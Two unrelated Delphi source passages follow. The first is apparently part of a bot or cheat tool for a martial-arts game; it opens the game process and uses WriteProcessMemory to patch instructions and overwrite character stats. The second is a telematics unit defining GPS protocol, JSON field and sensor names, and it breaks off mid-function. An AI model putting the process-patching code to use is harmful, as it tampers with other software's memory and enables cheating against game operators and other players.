Items[i].Name:=CharArrayTemp; for j:=0 to 15 do CharArrayTemp[j]:=ItemBuffer[$10+j]; Items[i].Maker:=CharArrayTemp; Items[i].Level:=Byte(ItemBuffer[$2f])*256*65536+Byte(ItemBuffer[$2e])*65536 +Byte(ItemBuffer[$2d])*256+Byte(ItemBuffer[$2c]); Items[i].Price:=Byte(ItemBuffer[$27])*256*65536+Byte(ItemBuffer[$26])*65536 +Byte(ItemBuffer[$25])*256+Byte(ItemBuffer[$24]); Items[i].ID:=Byte(ItemBuffer[$23])*256*65536+Byte(ItemBuffer[$22])*65536 +Byte(ItemBuffer[$21])*256+Byte(ItemBuffer[$20]); Items[i].ItemType:=Byte(ItemBuffer[$2b])*256+Byte(ItemBuffer[$2a]); Items[i].PlusLife:=Byte(ItemBuffer[$31])*256+Byte(ItemBuffer[$30]); Items[i].PlusNeili:=Byte(ItemBuffer[$33])*256+Byte(ItemBuffer[$32]); Items[i].PlusGongji:=Byte(ItemBuffer[$35])*256+Byte(ItemBuffer[$34]); Items[i].PlusFangyu:=Byte(ItemBuffer[$37])*256+Byte(ItemBuffer[$36]); Items[i].PlusMinjie:=Byte(ItemBuffer[$39])*256+Byte(ItemBuffer[$38]); Items[i].PlusDufang:=Byte(ItemBuffer[$3b])*256+Byte(ItemBuffer[$3a]); Items[i].PlusDingfang:=Byte(ItemBuffer[$3d])*256+Byte(ItemBuffer[$3c]); Items[i].PlusShuifang:=Byte(ItemBuffer[$3f])*256+Byte(ItemBuffer[$3e]); Items[i].PlusHunfang:=Byte(ItemBuffer[$41])*256+Byte(ItemBuffer[$40]); // 如果是毒药,取负值 if Items[i].ItemType=600 then Items[i].PlusLife:=0-Items[i].PlusLife; end; end; function TUser.FindNeiyaoPos: integer; // 从 1 开始,0说明没有找到 var i: integer; begin Result:=0; GetItems; for i:=0 to ItemCount-1 do begin If (Items[i].ItemType=ItemLiaoshangyao) and (Items[i].PlusNeili<>0) then begin Result:=i+1; break; end; end; end; function TUser.UseItem(ID: DWORD): Boolean; var tmpWin: TWindowInfo; tmpPos: Integer; XY: TPoint; begin Result := False; tmpWin := HLInfoList.GlobalHL.ItemOfWindowTitle(HLInfoList.GlobalHL.UserName + ' - Item/Equipment'); if tmpWin = nil then Exit; tmpPos := FindItemPosByID(ID); if tmpPos = 0 then Exit; XY := GetItemXY(tmppos); // 双击要使用的物品, 注意,这个物品千万不能双击多次 LeftDblClickOnSomeWindow_Post(tmpwin.Window, XY.X, XY.Y); Result := True; end; function TUser.DropItem(ID: DWORD): Boolean; var tmpWin, tmpButton: TWindowInfo; tmpPos: Integer; XY: TPoint; begin Result := False; tmpWin := HLInfoList.GlobalHL.ItemOfWindowTitle(HLInfoList.GlobalHL.UserName + ' - Item/Equipment'); if tmpWin = nil then Exit; tmpPos := FindItemPosByID(ID); if tmpPos = 0 then Exit; XY := GetItemXY(tmppos); // 双击要使用的物品, 注意,这个物品千万不能双击多次 LeftClickOnSomeWindow_Post(tmpwin.Window, XY.X, XY.Y); Sleep(100); tmpButton := HLInfoList.GlobalHL.LocateChildWindowInfoByTitle(tmpWin, 'Drop Item', true); if tmpWin = nil then Exit; LeftClickOnSomeWindow_Post(tmpButton.Window, 1, 1); Result := True; end; procedure TUser.PatchItemWindow; var ProcessHandle: THandle; lpNumberOfBytes: SIZE_T; BufferDWord: DWORD; BufferByte: Byte; tmpWin: TWindowInfo; begin //BufferDWord := $00007EE9; BufferDWord := $00005BE9; BufferByte := $00; //0042A42B jump to loc 0x60 distance ProcessHandle := OpenProcess(PROCESS_ALL_ACCESS, False, HLInfoList.GlobalHL.ProcessId); if ProcessHandle <> 0 then begin //WriteProcessMemory(ProcessHandle, Pointer($0042A3CB), @BufferDWord, 4, lpNumberOfBytes); //WriteProcessMemory(ProcessHandle, Pointer($0042A3CD), @BufferByte, 1, lpNumberOfBytes); WriteProcessMemory(ProcessHandle, Pointer($0042A3CB), @BufferDWord, 4, lpNumberOfBytes); WriteProcessMemory(ProcessHandle, Pointer($0042A3CF), @BufferByte, 1, lpNumberOfBytes); end; CloseHandle(ProcessHandle); // 隐藏窗体 //物品/装备 tmpWin := HLInfoList.GlobalHL.ItemOfWindowTitle(HLInfoList.GlobalHL.UserName + ' - Item/Equipment'); if tmpWin <> Nil then if IsWindow(tmpWin.Window) and IsWindowVisible(tmpWin.Window) then ShowWindow(tmpWin.Window, SW_HIDE); end; procedure TUser.UnPatchItemWindow; var ProcessHandle: THandle; lpNumberOfBytes: SIZE_T; BufferDWord: DWORD; BufferByte: Byte; tmpWin: TWindowInfo; begin //BufferDWord := $E8B875FF; BufferDWord := $E8B875FF; //BufferByte := $01; BufferByte := $3D; ProcessHandle := OpenProcess(PROCESS_ALL_ACCESS, False, HLInfoList.GlobalHL.ProcessId); if ProcessHandle<>0 then begin //WriteProcessMemory(ProcessHandle, Pointer($429edb), @BufferDWord, 4, lpNumberOfBytes); //WriteProcessMemory(ProcessHandle, Pointer($429edf), @BufferByte, 1, lpNumberOfBytes); WriteProcessMemory(ProcessHandle, Pointer($0042A3CB), @BufferDWord, 4, lpNumberOfBytes); WriteProcessMemory(ProcessHandle, Pointer($0042A3CF), @BufferByte, 1, lpNumberOfBytes); end; CloseHandle(ProcessHandle); // 关闭窗体 tmpWin := HLInfoList.GlobalHL.ItemOfWindowTitle(HLInfoList.GlobalHL.UserName + ' - Item/Equipment'); if tmpWin <> Nil then if IsWindow(tmpWin.Window) and (not IsWindowVisible(tmpWin.Window)) then Sendmessage(tmpWin.Window, WM_CLOSE, 0, 0); end; procedure TUser.AddStats(statType: String; points: integer); var statOffset: WORD; ProcessHandle: THandle; lpNumberOfBytes: SIZE_T; StatFormAddr: DWORD; NewRem: Integer; begin if statType = 'Life' then statOffset := AttrOffset_Life else if statType = 'Mana' then statOffset := AttrOffset_Mana else if statType = 'Attack' then statOffset := AttrOffset_Attack else if (statType = 'Defense') or (statType = 'Defence') then statOffset := AttrOffset_Defense else if statType = 'Dexterity' then statOffset := AttrOffset_Dexterity else Exit; ProcessHandle := OpenProcess(PROCESS_ALL_ACCESS, False, HLInfoList.GlobalHL.ProcessId); if ProcessHandle<>0 then begin ReadFromHLMEM(Pointer(HL_HeroStatsFormAddressAddress), @StatFormAddr, 4); WriteProcessMemory(ProcessHandle, Pointer(StatFormAddr + statOffset), @points, 4, lpNumberOfBytes); NewRem := ThisUser.OldRemaining - points; WriteProcessMemory(ProcessHandle, Pointer(StatFormAddr + AttrOffset_Rem), @NewRem, 4, lpNumberOfBytes); end; CloseHandle(ProcessHandle); end; function TCreateWG.FindWindows(var hwndMC, hwndXS, hwndNL, hwndQS, hwndGJ, hwndBZ, hwndButtonCZ: HWND):HWND; // 返回创招窗口的HWND,如果为0,说明没有找到 const RepCountTol=5; var i: integer; tmpWin, WinCreateWG : TWindowInfo; hwndCreateWG, hwndXiaoguo, hwndJiben: HWND; begin Result := 0; hwndMC := 0; hwndXS := 0; hwndNL := 0; hwndQS := 0; hwndGJ := 0; hwndBZ := 0; hwndButtonCZ := 0; tmpWin := HLInfoList.GlobalHL.ItemOfWindowTitle('Create Kungfu'); if tmpWin = nil then Exit; hwndCreateWG := tmpWin.Window; hwndXiaoguo := HLInfoList.GlobalHL. LocateChildWindowWNDByTitle(hwndCreateWG, 'Effect Settings', True); hwndJiben := HLInfoList.GlobalHL. LocateChildWindowWNDByTitle(hwndCreateWG, 'Basic Settings', True); hwndButtonCZ := HLInfoList.GlobalHL. LocateChildWindowWNDByTitle(hwndCreateWG, 'OK(&O)', True); if (hwndXiaoguo = 0) or (hwndJiben = 0) or (hwndButtonCZ = 0) then Exit; WinCreateWG := HLInfoList.GlobalHL.ItemOfWindowTitle('Create Kungfu'); // 这必须再来一次,因为会变 for i := 0 to HLInfoList.GlobalHL.Count - 1 do begin tmpWin := HLInfoList.GlobalHL.Items[i]; if tmpWin.ParentWin = nil then Continue; if (tmpWin.ParentWin.Window = hwndXiaoguo) then // QS, GJ, BZ begin if (tmpWin.Top - CreateWG_QS_TopJust = winCreateWG.Top) then begin hwndQS := tmpWin.Window; end else if (tmpWin.Top - CreateWG_GJ_TopJust = winCreateWG.Top) then begin hwndGJ := tmpWin.Window; end else if (tmpWin.Top - CreateWG_BZ_TopJust = winCreateWG.Top) then begin hwndBZ := tmpWin.Window; end; end else if (tmpWin.ParentWin.Window = hwndJiben) then // MC, XS, NL begin if (tmpWin.Top - CreateWG_MC_TopJust = winCreateWG.Top) then begin hwndMC := tmpWin.Window; end else if (tmpWin.Top - CreateWG_XS_TopJust = winCreateWG.Top) then begin hwndXS := tmpWin.Window; end else if (tmpWin.Top - CreateWG_NL_TopJust = winCreateWG.Top) then begin hwndNL := tmpWin.Window; end; end; end; if (hwndMC > 0) and (hwndXS > 0) and (hwndNL > 0) and (hwndQS > 0) and (hwndGJ > 0) and (hwndBZ > 0) and (hwndButtonCZ > 0) then Result := hwndCreateWG; end; function TCreateWG.DoCreateWG: Boolean; var hwndCreateWG, hwndMC, hwndXS, hwndNL, hwndQS, hwndGJ, hwndBZ, hwndButtonCZ: HWND; tmpMC, tmpXS, tmpNL, tmpQS, tmpGJ, tmpBZ: String; begin Result := False; hwndCreateWG := FindWindows(hwndMC, hwndXS, hwndNL, hwndQS, hwndGJ, hwndBZ, hwndButtonCZ); if hwndCreateWG = 0 then Exit; EnableWindow(hwndCreateWG, False); WindowSetText(hwndMC, ThisWGAttrs.MC); WindowSetText(hwndXS, ThisWGAttrs.XS); WindowSetText(hwndNL, ThisWGAttrs.NL); Sleep(100); tmpMC := WindowGetText(hwndMC); tmpXS := WindowGetText(hwndXS); tmpNL := WindowGetText(hwndNL); if (tmpMC <> ThisWGAttrs.MC) or (tmpXS <> ThisWGAttrs.XS) or (tmpNL <> ThisWGAttrs.NL) then Exit; SendMessage(hwndQS, CB_SETCURSEL, StrToInt(ThisWGAttrs.QS) - 1, 0); SendMessage(hwndGJ, CB_SETCURSEL, StrToInt(ThisWGAttrs.GJ) - 1, 0); SendMessage(hwndBZ, CB_SETCURSEL, StrToInt(ThisWGAttrs.BZ) - 1, 0); Sleep(100); tmpQS := WindowGetText(hwndQS); tmpGJ := WindowGetText(hwndGJ); tmpBZ := WindowGetText(hwndBZ); if (tmpQS <> ThisWGAttrs.QS) or (tmpGJ <> ThisWGAttrs.GJ) or (tmpBZ <> ThisWGAttrs.BZ) then Exit; EnableWindow(hwndCreateWG, True); // 点击创招 Sendmessage(hwndButtonCZ, WM_LBUTTONDOWN, MK_LBUTTON, 1 + 1 * 65536); Sendmessage(hwndButtonCZ, WM_LBUTTONUP, 0, 1 + 1 * 65536); Result := True; end; function TCreateWG.DoDeleteWGs: Boolean; // 删除武功 var tmpWin: TWindowInfo; hwndSkill, hwndLearnedSkillList, hwndForget: HWND; tmpRect: TRect; begin Result := False; tmpWin := HLInfoList.GlobalHL.ItemOfWindowTitle('Kungfu'); if tmpWin = nil then Exit; hwndSkill:=tmpWin.Window; tmpWin := HLInfoList.GlobalHL.ItemOfWindowTitle('Skill(s) Learned'); if tmpWin = nil then Exit; hwndLearnedSkillList := HLInfoList.GlobalHL. LocateChildWindowWNDByTitle(tmpWin.Window, '', True); if hwndLearnedSkillList = 0 then Exit; hwndForget := HLInfoList.GlobalHL. LocateChildWindowWNDByTitle(hwndSkill, 'Forget(&F)', True); if hwndForget = 0 then Exit; ThisUser.GetWGs; if DeleteWGRemainIndicator=DelWGRemainEasyWG then begin // 保留容易招 repeat if ThisUser.WGs[DeleteFrom-1].Real_DisplayXishuPercent>=100 // 容易招 then DeleteFrom:=DeleteFrom+1 else break; until DeleteFrom>ThisUser.WGCount; end else if DeleteWGRemainIndicator<>DelWGNoIndicator then begin // 保留系数 repeat if ThisUser.WGs[DeleteFrom-1].DisplayXishuMultiply100*ThisUser.WGs[DeleteFrom-1].Real_DisplayXishuPercent/10000>=DeleteWGRemainIndicator then DeleteFrom:=DeleteFrom+1 else break; until DeleteFrom>ThisUser.WGCount; end; if DeleteFrom>ThisUser.WGCount then Exit; // 无招可删了 EnableWindow(hwndSkill, False); if SendMessage(hwndLearnedSkillList, LB_SETCURSEL, DeleteFrom-1, 0)=LB_ERR then Exit; if SendMessage(hwndLearnedSkillList, LB_GETITEMRECT, DeleteFrom-1, LPARAM(@tmpRect))=LB_ERR then Exit; LeftClickOnSomeWindow_Send(hwndLearnedSkillList, tmpRect.Left, tmpRect.Top); if DeleteFrom=SendMessage(hwndLearnedSkillList, LB_GETCURSEL, 0, 0)+1 then begin OldWGCount:=ThisUser.WGCount; LeftClickOnSomeWindow_Post(hwndForget, 0, 0); end; EnableWindow(hwndSkill, True); Result:=True; end; procedure TCreateWG.PatchCreateWG; var ProcessHandle: THandle; lpNumberOfBytes: SIZE_T; BufferDWord, BufferDWord2: DWORD; BufferWord: WORD; // BufferByte: Byte; tmpWin: TWindowInfo; begin ProcessHandle := OpenProcess(PROCESS_ALL_ACCESS, False, HLInfoList.GlobalHL.ProcessId); if ProcessHandle <> 0 then begin //BufferDWord := $0000A3E9; BufferDWord := $0000A3E9; WriteProcessMemory(ProcessHandle, Pointer($458AA5), @BufferDWord, 4, lpNumberOfBytes); //4467DD BufferDWord := $000001B8; BufferDWord2 := $90909000; BufferWord := $9090; WriteProcessMemory(ProcessHandle, Pointer($4512E0), @BufferDWord, 4, lpNumberOfBytes); //4403F3 WriteProcessMemory(ProcessHandle, Pointer($4512E4), @BufferDWord2, 4, lpNumberOfBytes); WriteProcessMemory(ProcessHandle, Pointer($4512E8), @BufferWord, 2, lpNumberOfBytes); end; CloseHandle(ProcessHandle); tmpWin := HLInfoList.GlobalHL.ItemOfWindowTitle('Create Kungfu'); if tmpWin <> nil then if IsWindow(tmpWin.Window) and IsWindowVisible(tmpWin.Window) then ShowWindow(tmpWin.Window, SW_HIDE); tmpWin := HLInfoList.GlobalHL.ItemOfWindowTitle('Kungfu'); //修炼技能 if tmpWin <> nil then if IsWindow(tmpWin.Window) and IsWindowVisible(tmpWin.Window) then ShowWindow(tmpWin.Window, SW_HIDE); end; procedure TCreateWG.UnPatchCreateWG; var ProcessHandle: THandle; lpNumberOfBytes: SIZE_T; BufferDWord, BufferDWord2: DWORD; BufferWord: WORD; // BufferByte: Byte; tmpWin: TWindowInfo; begin ProcessHandle := OpenProcess(PROCESS_ALL_ACCESS, False, HLInfoList.GlobalHL.ProcessId); if ProcessHandle <> 0 then begin BufferDWord := $00A2840F; WriteProcessMemory(ProcessHandle, Pointer($458AA5), @BufferDWord, 4, lpNumberOfBytes); //BufferDWord := $66E831FF; //BufferDWord2 := $83FFFCE4; BufferDWord := $01E831FF; BufferDWord2 := $83FFFBB4; BufferWord := $0CC4; WriteProcessMemory(ProcessHandle, Pointer($4512E0), @BufferDWord, 4, lpNumberOfBytes); WriteProcessMemory(ProcessHandle, Pointer($4512E4), @BufferDWord2, 4, lpNumberOfBytes); WriteProcessMemory(ProcessHandle, Pointer($4512E8), @BufferWord, 2, lpNumberOfBytes); end; CloseHandle(ProcessHandle); tmpWin := HLInfoList.GlobalHL.ItemOfWindowTitle('Create Kungfu'); if tmpWin <> nil then if IsWindow(tmpWin.Window) and (not IsWindowVisible(tmpWin.Window)) then Sendmessage(tmpWin.Window, WM_CLOSE, 0, 0); tmpWin := HLInfoList.GlobalHL.ItemOfWindowTitle('Kungfu'); if tmpWin <> nil then if IsWindow(tmpWin.Window) and (not IsWindowVisible(tmpWin.Window)) then Sendmessage(tmpWin.Window, WM_CLOSE, 0, 0); end; initialization ThisWork := TWork.Create; ThisUser := TUser.Create; finalization ThisWork.Free; ThisUser.Free; end.
unit Ils.Json.Names; //------------------------------------------------------------------------------ interface uses SysUtils; //------------------------------------------------------------------------------ const //------------------------------------------------------------------------------ //! список протоколов //------------------------------------------------------------------------------ dtUnknown = 0; dtNovacom = 1; dtWialon = 2; dtMintrans = 3; dtNavtelecom = 4; dtRusAgroTaxi = 5; dtRuptela = 6; dtExpeditor = 7; //------------------------------------------------------------------------------ //! корневые поля JSON'ов точек //------------------------------------------------------------------------------ {! неизвестно, версия, imei прибора, количество спутников(*), координаты корректны, тип протокола, широта(**), долгота(**), дата и время точки, дата и время приёма, пробег(*), скорость(*), нажата тревожная кнопка(***), работает ли мотор(*), направление(*), высота(*), датчики(*) } (* * - необязятельный параметр ** - обязательны для точки, НО отсутствуют для "точек" снимков *** - есть, если нажата ТК *) type TJsonField = ( jfUnknown, jfGeneration, jfImei, jfSatellitesCount, jfSatellitesValid, jfDeviceType, jfLatitude, jfLongitude, jfDateTime, jfReceived, jfLen, jfVelocity, jfPanic, jfEngineWorks, jfAzimuth, jfAltitude, jfSensors, jfDeviceVelocity, jfDeviceAzimuth ); const CJsonField: array[TJsonField] of string = ( 'unknown', 'g', 'i', 'sc', 'sv', 't', 'la', 'lo', 'dt', 'r', 'l', 'v', 'panic', 'ew', 'd', 'a', 's', 'dv', 'dd' ); //------------------------------------------------------------------------------ //! типы данных сенсоров //------------------------------------------------------------------------------ type TSensorMeasure = ( smUnknown, smBinary, smBinary8, smBinary16, smBinary32, smInteger, smFloat, smRaw, smString ); const CSensorMeasureStr: array[TSensorMeasure] of string = ( 'unknown', '1', '8', '16', '32', 'i', 'f', 'raw', 's' ); //------------------------------------------------------------------------------ //! список сенсоров //------------------------------------------------------------------------------ type TSensorType = ( stUnknown, // <неизвестный> stVExt, // внешнее питание - мВ stVInt, // внутреннее питание - мВ stAin, // аналоговые входы stBin, // цифровые входы stBin8, // цифровые входы stBout, // цифровые выходы stBout8, // цифровые выходы stCamera, // .СНИМОК КАМЕРЫ. stTemp, // температура - градусы C stCounter, // счётчик stMileage, // полный пробег - км stMoto, // моточасы - с stFuelTemp, // температура топлива - градусы C stFuel, // топливо RS232/RS485 - для тарировки stCANFuelP, // CAN-топливо - % stCANFuelL, // CAN-топливо - л stCANFuelConsume, // CAN-полный расход топлива - л stCANRPM, // CAN-обороты двигателя stCANDistance, // CAN-полный пробег stCANCoolTemp, // CAN-температура охлаждающей жидкости - градусы C stCANAxleLoad, // CAN-нагрузка на ось - кг stCANPAccel, // CAN-педаль газа - % stCANPStop, // CAN-педаль тормоза - % stCANFilterP, // CAN-уровень жидкости в дизельном фильтре выхлопных газов - % stCANFilterL, // CAN-уровень жидкости в дизельном фильтре выхлопных газов - л stCANEngineLoad, // CAN-нагрузка двигателя - % stCANEngineTime, // CAN-время работы двигателя - с stCANTillDTM, // CAN-расстояние до ТО - км stCANVelocity, // CAN-скорость - км/ч stCANInfoSt, // CAN-флаги состояния безопасности stCANSecurity, // CAN-события состояния безопасности stCANAlarmSt, // CAN-контроллеры аварии stCANFaultSt, // CAN-состояние ламп индикации неисправностей stCANFault, // CAN-диагностический код неисправности stHDOP, // hdop stVDOP, // vdop stPDOP, // pdop stTDOP, // tdop stGDOP, // gdop stFlowsensSt, // ДУТ: статус датчика stFlowsensTotalCons, // ДУТ: суммарный расход топлива - л stFlowsensTripCons, // ДУТ: расход топлива за поездку - л stFlowsensFlow, // ДУТ: текущая скорость потока - л/ч stFlowsensFeedCons, // ДУТ: суммарный объем топлива камеры подачи - л stFlowsensFeedFlow, // ДУТ: текущая скорость потока камеры подачи - л/ч stFlowsensFeedTemp, // ДУТ: температура камеры подачи - градусы C stFlowsensReturnCons, // ДУТ: суммарный объем топлива камеры обратки - л stFlowsensReturnFlow, // ДУТ: текущая скорость потока камеры обратки - л/ч stFlowsensReturnTemp, // ДУТ: температура камеры обратки - градусы C stBDTimeInc, // приращение времени - с stBDAccelX, // линейное ускорение по X - g stBDAccelY, // линейное ускорение по Y - g stBDAccelZ, // линейное ускорение по Z - g stBDAccelModule, // модуль вектора ускорения - g stBDAccelMax, // максимальное значение положительного ускорения за период - g stBDBrakeMax, // максимальное значение отрицательного ускорения (торможения) за период - g stBDCrnMax, // максимальное значение бокового ускорения за период - g stBDAngMax, // максимальное значение углового ускорения за период - градус/с^2 stBDVertMax, // максимальное значение вертикального ускорения за период - g stBDSpeedMax, // максимальное значение скорости за период - км/ч stBDDuration, // длительность превышения порога - с stBDSpeedState, // состояние порогов скорости stBDAllState, // состояние порогов ускорения stFreq, // частота на аналогово-частотном датчике - гц stFuelFreq, // частота на выходе датчика уровня топлива - гц stEngineHoursWork, // пользовательские моточасы 1 (работа под нагрузкой) - с stEngineHoursIdle, // пользовательские моточасы 2 (работа без нагрузки) - с stHPTemp, // высокоточный датчик температуры - градусы C stHPHumidity, // высокоточный датчик влажности - % stGeoState, // информация о нахождении в геозонах stAccelState, // состояние виртуальных датчиков акселерометра stTiltLocal, // внутренний датчик угла наклона: угол наклона относительно местной вертикали - градусы stTiltPitch, // внутренний датчик наклона: угол тангажа - градусы stTiltRoll, // внутренний датчик наклона: угол крена - градусы stTiltX, // внешний датчик угла наклона: отклонение по оси X stTiltY, // внешний датчик угла наклона: отклонение по оси Y stTiltZ, // внешний датчик угла наклона: отклонение по оси Z stPassCount, // счётчик пассажиропотока stTacho, // данные от тахографа stTachoMode, // режим работы тахографа/карта stTachoState, // флаги состояния от тахографа stTachoSpeed, // скорость по тахографу - км/ч stTachoOdom, // одометр по тахографу - км stTachoTime, // время по тахографу - с от 1970 (unix time) stTachoDmStatus, // текущее состояние водителя принятое от дисплейного модуля stTachoDmIndex, // индекс последнего полученного/прочитанного сообщения на дисплейном модуле stFridgeState, // РУ: состояние stFridgeTemp, // РУ: температура рефрижератора - градусы C stFridgeSetTemp, // РУ: температура установленная - градусы C stFridgeTempOut, // РУ: температура окружающего воздуха - градусы C stFridgeTempIn, // РУ: температура ОЖ - градусы C stFridgeV, // РУ: напряжение аккумулятора - мВ stFridgeA, // РУ: сила тока аккумулятора - мВ stFridgeMotoInt, // РУ: моточасы работы от двигателя - ч stFridgeMotoExt, // РУ: моточасы работы от сети - ч stFridgeCompMode, // РУ: конфигурация компрессора stFridgeEngineRpm, // РУ: состояние двигателя, обороты stFridgeEngineMode, // РУ: состояние двигателя, режим stFridgeFault, // РУ: код ошибки stFridgeFaultCount, // РУ: количество ошибок stShinNumber, // датчик давления в шинах: № колеса stShinPressure, // датчик давления в шинах: давление - бар stShinTemp, // датчик давления в шинах: температура - градусы C stAutoinfStatus, // статус автоинформатора stLastGeoID, // ID последней геозоны stLastStopID, // ID последней остановки stRouteID, // ID текущего маршрута stCamStatus // статус камеры ); const CSensorNamePrefix: array[TSensorType] of string = ( 'unknown', //stUnknown 'vext', //stVExt 'vint', //stVInt 'ain', //stAin 'bin', //stBin 'bin', //stBin8 'bout', //stBout 'bout', //stBout8 'cam', //stCamera 'temp', //stTemp 'cnt', //stCounter 'mil', //stMileage 'moto', //stMoto 'fueltemp', //stFuelTemp 'fuel', //stFuel 'fuelp', //stCANFuelP 'fuell', //stCANFuelL 'fuelconsume', //stCANFuelConsume 'rpm', //stCANRPM 'distance', //stCANDistance 'cool', //stCANCoolTemp 'axle', //stCANAxleLoad 'paccel', //stCANPAccel 'pstop', //stCANPStop 'filterp', //stCANFilterP 'filterl', //stCANFilterL 'eload', //stCANEngineLoad 'etime', //stCANEngineTime 'till_dtm', //stCANTillDTM 'vel', //stCANVelocity 'can_info_st', //stCANInfoSt 'can_security_evt', //stCANSecurity 'can_alarm_st', //stCANAlarmSt 'can_fault_st', //stCANFaultSt 'can_fault', //stCANFault 'hdop', //stHDOP 'vdop', //stVDOP 'pdop', //stPDOP 'tdop', //stTDOP 'gdop', //stGDOP 'flowsens_st', //stFlowsensSt 'flowsens_total_cons', //stFlowsensTotalCons 'flowsens_trip_cons', //stFlowsensTripCons 'flowsens_flow_spd', //stFlowsensFlow 'flowsens_feed_cons', //stFlowsensFeedCons 'flowsens_feed_flow_spd', //stFlowsensFeedFlow 'flowsens_feed_temp', //stFlowsensFeedTemp 'flowsens_return_cons', //stFlowsensReturnCons 'flowsens_return_flow_spd', //stFlowsensReturnFlow 'flowsens_return_temp', //stFlowsensReturnTemp 'timeinc', //stBDTimeInc 'accx', //stBDAccelX 'accy', //stBDAccelY 'accz', //stBDAccelZ 'wln_accel_module', //stBDAccelModule 'wln_accel_max', //stBDAccelMax 'wln_brk_max', //stBDBrakeMax 'wln_crn_max', //stBDCrnMax 'wln_ang_max', //stBDAngMax 'wln_vert_max', //stBDVertMax 'wln_spd_max', //stBDSpeedMax 'thld_duration', //stBDDuration 'thld_spd_st', //stBDSpeedState 'thld_all_st', //stBDAllState 'freq', //stFreq 'fuel_freq', //stFuelFreq 'engine_hours_work', //stEngineHoursWork 'engine_hours_idle', //stEngineHoursIdle 'hp_temp', //stHPTemp 'hp_humidity', //stHPHumidity 'geo_st', //stGeoState 'accel_st', //stAccelState 'int_tilt_sens_local', //stTiltLocal 'int_tilt_sens_pitch', //stTiltPitch 'int_tilt_sens_roll', //stTiltRoll 'ext_tilt_sens_x', //stTiltX 'ext_tilt_sens_y', //stTiltY 'ext_tilt_sens_z', //stTiltZ 'p_count', //stPassCount 'tacho', //stTacho 'tacho_mode', //stTachoMode 'tacho_state', //stTachoState 'tacho_speed', //stTachoSpeed 'tacho_odom', //stTachoOdom 'tacho_time', //stTachoTime 'dm_status', //stTachoDmStatus 'dm_mess_n', //stTachoDmIndex 'fridge_st', //stFridgeState 'fridge_temp', //stFridgeTemp 'fridge_set_temp', //stFridgeSetTemp 'fridge_outside_temp', //stFridgeTempOut 'fridge_coolant_temp', //stFridgeTempIn 'fridge_pwr_vlt', //stFridgeV 'fridge_pwr_cur', //stFridgeA 'fridge_eng_moto_hours', //stFridgeMotoInt 'fridge_elec_moto_hours', //stFridgeMotoExt 'fridge_comp_mode', //stFridgeCompMode 'fridge_engine_rpm', //stFridgeEngineRpm 'fridge_engine_mode', //stFridgeEngineMode 'fridge_fault', //stFridgeFault 'fridge_fault_count', //stFridgeFaultCount 'tpms_number', //stShinNumber 'tpms_pressure', //stShinPressure 'tpms_temp', //stShinTemp 'autoinf_status', //stAutoinfStatus 'last_geo_id', //stLastGeoID 'last_stop_id', //stLastStopID 'cur_route_id', //stRouteID 'camstatus' //stCamStatus ); CSensorMeasureByType: array[TSensorType] of TSensorMeasure = ( smUnknown, //stUnknown smInteger, //stVExt smInteger, //stVInt smInteger, //stAin smBinary, //stBin smBinary8, //stBin8 smBinary, //stBout smBinary8, //stBout8 smRaw, //stCamera smInteger, //stTemp smInteger, //stCounter smFloat, //stMileage smInteger, //stMoto smInteger, //stFuelTemp smInteger, //stFuel smInteger, //stCANFuelP smFloat, //stCANFuelL smFloat, //stCANFuelConsume smInteger, //stCANRPM smFloat, //stCANDistance smInteger, //stCANCoolTemp smInteger, //stCANAxleLoad smInteger, //stCANPAccel smInteger, //stCANPStop smInteger, //stCANFilterP smFloat, //stCANFilterL smInteger, //stCANEngineLoad smInteger, //stCANEngineTime smInteger, //stCANTillDTM smInteger, //stCANVelocity smBinary16, //stCanInfoSt smInteger, //stCanSecurity smBinary32, //stCanAlarmSt smBinary8, //stCanFaultSt smInteger, //stCanFault smFloat, //stHDOP smFloat, //stVDOP smFloat, //stPDOP smFloat, //stTDOP smFloat, //stGDOP smInteger, //stFlowsensSt, smFloat, //stFlowsensTotalCons, smFloat, //stFlowsensTripCons, smFloat, //stFlowsensFlow, smFloat, //stFlowsensFeedCons, smFloat, //stFlowsensFeedFlow, smFloat, //stFlowsensFeedTemp, smFloat, //stFlowsensReturnCons, smFloat, //stFlowsensReturnFlow, smFloat, //stFlowsensReturnTemp smFloat, //stBDTimeInc smFloat, //stBDAccelX smFloat, //stBDAccelY smFloat, //stBDAccelZ smFloat, //stBDAccelModule smFloat, //stBDAccelMax smFloat, //stBDBrakeMax smFloat, //stBDCrnMax smFloat, //stBDAngMax smFloat, //stBDVertMax smInteger, //stBDSpeedMax smFloat, //stBDDuration smInteger, //stBDSpeedState smInteger, //stBDAllState smInteger, //stFreq smInteger, //stFuelFreq smInteger, //stEngineHoursWork smInteger, //stEngineHoursIdle smFloat, //stHPTemp smFloat, //stHPHumidity smInteger, //stGeoState smInteger, //stAccelState smFloat, //stTiltLocal smFloat, //stTiltPitch smFloat, //stTiltRoll smInteger, //stTiltX smInteger, //stTiltY smInteger, //stTiltZ smInteger, //stPassCount smInteger, //stTacho smInteger, //stTachoMode smInteger, //stTachoState smInteger, //stTachoSpeed smFloat, //stTachoOdom smInteger, //stTachoTime smInteger, //stTachoDmStatus smInteger, //stTachoDmIndex smInteger, //stFridgeState smFloat, //stFridgeTemp smFloat, //stFridgeSetTemp smFloat, //stFridgeTempOut smFloat, //stFridgeTempIn smInteger, //stFridgeV smInteger, //stFridgeA smFloat, //stFridgeMotoInt smFloat, //stFridgeMotoExt smInteger, //stFridgeCompMode smInteger, //stFridgeEngineRpm smInteger, //stFridgeEngineMode smInteger, //stFridgeFault smInteger, //stFridgeFaultCount smInteger, //stShinNumber smFloat, //stShinPressure smInteger, //stShinTemp smInteger, //stAutoinfStatus smInteger, //stLastGeoID smInteger, //stLastStopID smInteger, //stRouteID smInteger //stCamStatus ); type TJsonEventField = ( jefType, jefImei, jefBegin, jefDuration, jefLatitude, jefLongitude, jefRadius, jefDispersion, jefUpdate ); const CJsonEventField: array[TJsonEventField] of string = ( 'EventTypeID', 'IMEI', 'DT', 'Duration', 'Latitude', 'Longitude', 'Radius', 'Dispersion', 'Update' ); function JF2Str(const AJF: TJsonField): string; function Str2JF(const AStr: string): TJsonField; function MakeSensorName(const AType: TSensorType): string; overload; function MakeSensorName(const AType: TSensorType; const AIdx: Integer): string; overload; function GetSensorIdx(const AName: string): Integer; function GetSensorName(const AName: string): string; function GetSensorMeasure(const AName: string): TSensorMeasure; //------------------------------------------------------------------------------ implementation function JF2Str(const AJF: TJsonField): string; begin Result := CJsonField[AJF]; end; function Str2JF(const AStr: string): TJsonField; var jf: TJsonField; begin Result := jfUnknown; for jf := Succ(Low(TJsonField)) to 